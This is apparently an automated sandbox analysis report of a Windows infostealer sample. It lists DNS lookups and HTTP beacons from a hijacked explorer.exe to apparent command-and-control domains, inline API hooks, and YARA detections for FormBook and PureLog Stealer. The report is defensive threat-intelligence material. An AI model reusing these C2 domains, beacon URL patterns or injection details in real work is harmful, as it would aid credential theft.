                                                                                                                  Mar 18, 2024 14:44:34.211972952 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.306912899 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.360694885 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.449059963 CET8049719208.91.197.27192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.449131966 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.449269056 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.542612076 CET8049719208.91.197.27192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.934104919 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:16.123462915 CET8049719208.91.197.27192.168.2.8
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 18, 2024 14:41:50.701340914 CET6015953192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:41:50.808120966 CET53601591.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:11.153680086 CET6543553192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:11.277554035 CET53654351.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:30.856548071 CET6306453192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:31.018799067 CET53630641.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:50.856646061 CET5496853192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:50.993315935 CET53549681.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.497210026 CET5086053192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:11.596894026 CET53508601.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:32.263359070 CET6550653192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:32.354054928 CET53655061.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:52.676126957 CET5208153192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:52.854268074 CET53520811.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.356667995 CET6275153192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:13.523046017 CET53627511.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:33.841057062 CET6421253192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:34.015443087 CET53642121.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:54.434861898 CET5113753192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:54.529388905 CET53511371.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.186395884 CET5223453192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:45:15.359544039 CET53522341.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2024 14:41:50.701340914 CET | 192.168.2.8 | 1.1.1.1 | 0x19df | Standard query (0) | www.agathis.fun | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:11.153680086 CET | 192.168.2.8 | 1.1.1.1 | 0x616a | Standard query (0) | www.grupooceanique.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:30.856548071 CET | 192.168.2.8 | 1.1.1.1 | 0xabb1 | Standard query (0) | www.repair-services.today | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:50.856646061 CET | 192.168.2.8 | 1.1.1.1 | 0x2093 | Standard query (0) | www.taiyuanbaoyang.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:11.497210026 CET | 192.168.2.8 | 1.1.1.1 | 0x72a | Standard query (0) | www.beatricesswarthout.xyz | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:32.263359070 CET | 192.168.2.8 | 1.1.1.1 | 0xa10d | Standard query (0) | www.engagenotrage.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:52.676126957 CET | 192.168.2.8 | 1.1.1.1 | 0x1efd | Standard query (0) | www.velvetgloveseasonings.store | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:13.356667995 CET | 192.168.2.8 | 1.1.1.1 | 0x6d6b | Standard query (0) | www.gildedbeautyaesthitics.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:33.841057062 CET | 192.168.2.8 | 1.1.1.1 | 0x108c | Standard query (0) | www.maxhealthunity.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:54.434861898 CET | 192.168.2.8 | 1.1.1.1 | 0x535b | Standard query (0) | www.fonbnk.pro | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:45:15.186395884 CET | 192.168.2.8 | 1.1.1.1 | 0x93c1 | Standard query (0) | www.scheuermannworks.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2024 14:41:50.808120966 CET | 1.1.1.1 | 192.168.2.8 | 0x19df | No error (0) | www.agathis.fun | | 104.21.23.10 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:41:50.808120966 CET | 1.1.1.1 | 192.168.2.8 | 0x19df | No error (0) | www.agathis.fun | | 172.67.208.68 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:11.277554035 CET | 1.1.1.1 | 192.168.2.8 | 0x616a | Name error (3) | www.grupooceanique.com | none | none | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:31.018799067 CET | 1.1.1.1 | 192.168.2.8 | 0xabb1 | No error (0) | www.repair-services.today | | 172.67.146.200 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:31.018799067 CET | 1.1.1.1 | 192.168.2.8 | 0xabb1 | No error (0) | www.repair-services.today | | 104.21.39.169 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:50.993315935 CET | 1.1.1.1 | 192.168.2.8 | 0x2093 | No error (0) | www.taiyuanbaoyang.com | | 172.67.160.57 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:42:50.993315935 CET | 1.1.1.1 | 192.168.2.8 | 0x2093 | No error (0) | www.taiyuanbaoyang.com | | 104.21.90.194 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:11.596894026 CET | 1.1.1.1 | 192.168.2.8 | 0x72a | No error (0) | www.beatricesswarthout.xyz | | 172.67.171.253 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:11.596894026 CET | 1.1.1.1 | 192.168.2.8 | 0x72a | No error (0) | www.beatricesswarthout.xyz | | 104.21.88.28 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:32.354054928 CET | 1.1.1.1 | 192.168.2.8 | 0xa10d | Name error (3) | www.engagenotrage.com | none | none | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:43:52.854268074 CET | 1.1.1.1 | 192.168.2.8 | 0x1efd | No error (0) | www.velvetgloveseasonings.store | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:13.523046017 CET | 1.1.1.1 | 192.168.2.8 | 0x6d6b | No error (0) | www.gildedbeautyaesthitics.com | gildedbeautyaesthitics.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:44:13.523046017 CET | 1.1.1.1 | 192.168.2.8 | 0x6d6b | No error (0) | gildedbeautyaesthitics.com | | 192.0.78.25 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:13.523046017 CET | 1.1.1.1 | 192.168.2.8 | 0x6d6b | No error (0) | gildedbeautyaesthitics.com | | 192.0.78.24 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:34.015443087 CET | 1.1.1.1 | 192.168.2.8 | 0x108c | No error (0) | www.maxhealthunity.com | maxhealthunity.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:44:34.015443087 CET | 1.1.1.1 | 192.168.2.8 | 0x108c | No error (0) | maxhealthunity.com | | 15.197.142.173 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:34.015443087 CET | 1.1.1.1 | 192.168.2.8 | 0x108c | No error (0) | maxhealthunity.com | | 3.33.152.147 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:44:54.529388905 CET | 1.1.1.1 | 192.168.2.8 | 0x535b | Name error (3) | www.fonbnk.pro | none | none | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:45:15.359544039 CET | 1.1.1.1 | 192.168.2.8 | 0x93c1 | No error (0) | www.scheuermannworks.com | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
• www.agathis.fun
• www.repair-services.today
• www.taiyuanbaoyang.com
• www.beatricesswarthout.xyz
• www.velvetgloveseasonings.store
• www.gildedbeautyaesthitics.com
• www.maxhealthunity.com
• www.scheuermannworks.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49711 | 104.21.23.10 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:41:50.896878004 CET | 156 | OUT | GET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1
Host: www.agathis.fun
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:41:50.997144938 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 18 Mar 2024 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4515
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 18 Mar 2024 13:42:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDsIRP8EKti7nrZv%2BY0dk8ooQjL6SpMY87vWpP%2FcqpilLP%2FvaPStzvuIk41EpVUj2h5Q1No71IkF%2BeHrQeHXpE1HbnblQu%2Bwt2EpzGy3PzXKqpqR280Z6D04Np77ABwswf8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8665a4815f961902-EWR
alt-svc: h3=":443"; ma=86400
Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
Mar 18, 2024 14:41:50.997172117 CET | 1286 | IN | Data Raw: 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d
Data Ascii: h=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>bo
Mar 18, 2024 14:41:50.997219086 CET | 1286 | IN | Data Raw: 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d
Data Ascii: "></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="b
Mar 18, 2024 14:41:50.997288942 CET | 1286 | IN | Data Raw: 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38
Data Ascii: f-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8665a4815f961902</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:bl
Mar 18, 2024 14:41:50.997303963 CET | 50 | IN | Data Raw: 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: ranslation = {}; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 172.67.146.200 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:42:31.107731104 CET | 166 bytes | OUT | GET /ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw HTTP/1.1
Host: www.repair-services.today
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:42:31.208311081 CET | 744 bytes | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Mar 2024 13:42:31 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 18 Mar 2024 14:42:31 GMT
Location: https://www.repair-services.today/ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDcQIfUoL7r%2BBMilyOBjaDBEam5n2hpP2HNRS0OLGB9uD3w9yBl13KlgT3d%2FDgtJNZbt5Yjy%2BDGWGjqvmbbuw58dqLgPLtRXP7gAjzI4mzGAVS%2FkoLzFECwP9pHr2DITDQqgXNpHWOU5cub7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8665a57cac7c42de-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49714 | 172.67.160.57 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:42:51.242336988 CET | 163 bytes | OUT | GET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1
Host: www.taiyuanbaoyang.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 172.67.171.253 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:43:11.686520100 CET | 167 bytes | OUT | GET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1
Host: www.beatricesswarthout.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:43:11.790338039 CET | 759 bytes | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Mar 2024 13:43:11 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 18 Mar 2024 14:43:11 GMT
Location: https://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wtbTBz2H1Qt33%2FiEfZ6430Q%2FuIiHt5yZBAt0%2F9hB9J4WPtF3ipn%2FuTGUzE4oVteM0cIszGdqxq10Q0AqK%2BsV97XixNvskKpQeD692qYAsUnNJN3fxIPBAAhuuO%2F2dCA8X87%2F7ZvnfNYBGMEjwA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8665a67a4e4d1902-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 216.40.34.41 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:43:52.963320971 CET | 172 bytes | OUT | GET /ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq HTTP/1.1
Host: www.velvetgloveseasonings.store
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:43:53.081453085 CET | 1274 bytes | IN | HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-download-options: noopen
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
content-type: text/html; charset=utf-8
etag: W/"1eabcc29ddb5b0a2b0ea2dace537ca08"
cache-control: max-age=0, private, must-revalidate
x-request-id: c38c10d2-03ac-456c-a812-ad1f647f3a32
x-runtime: 0.009685
transfer-encoding: chunked
connection: close
Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>velvetgloveseasonings.store is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=parked"><img width="102" hei
Mar 18, 2024 14:43:53.081484079 CET | 1274 bytes | IN | Data Ascii: ght="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>velvetgloveseasonings.store</h1><h2>is a totally awesome idea still being worked on.</h2><p class='big'>Ch
Mar 18, 2024 14:43:53.081496000 CET | 1274 bytes | IN | Data Ascii: ce=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></ul></nav><nav class='social'><u
Mar 18, 2024 14:43:53.081510067 CET | 1274 bytes | IN | Data Ascii: 46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.4424
Mar 18, 2024 14:43:53.081523895 CET | 1274 bytes | IN | Data Ascii: 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t
Mar 18, 2024 14:43:53.081536055 CET | 138 bytes | IN | Data Ascii: analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49717 | 192.0.78.25 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:44:13.611800909 CET | 171 bytes | OUT | GET /ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H HTTP/1.1
Host: www.gildedbeautyaesthitics.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:44:13.699393034 CET | 508 bytes | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 18 Mar 2024 13:44:13 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H
X-ac: 2.jfk _dfw BYPASS
Alt-Svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49718 | 15.197.142.173 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:44:34.116378069 CET | 163 bytes | OUT | GET /ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj HTTP/1.1
Host: www.maxhealthunity.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Mar 18, 2024 14:44:34.211697102 CET | 266 bytes | IN | HTTP/1.1 403 Forbidden
Server: awselb/2.0
Date: Mon, 18 Mar 2024 13:44:34 GMT
Content-Type: text/html
Content-Length: 118
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49719 | 208.91.197.27 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:45:15.449269056 CET | 165 bytes | OUT | GET /ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB HTTP/1.1
Host: www.scheuermannworks.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE8
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE8
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE8
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE8


Target ID:0
Start time:14:41:09
Start date:18/03/2024
Path:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
Imagebase:0x120000
File size:841'224 bytes
MD5 hash:E2EDA8C49AB184DE6D3B030BD499E4D1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low
Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:14:41:11
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Imagebase:0xf30000
                                                                                                                  File size:841'224 bytes
                                                                                                                  MD5 hash:E2EDA8C49AB184DE6D3B030BD499E4D1
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:14:41:11
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff62d7d0000
                                                                                                                  File size:5'141'208 bytes
                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:4
                                                                                                                  Start time:14:41:14
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\SysWOW64\help.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                  Imagebase:0x7c0000
                                                                                                                  File size:10'240 bytes
                                                                                                                  MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
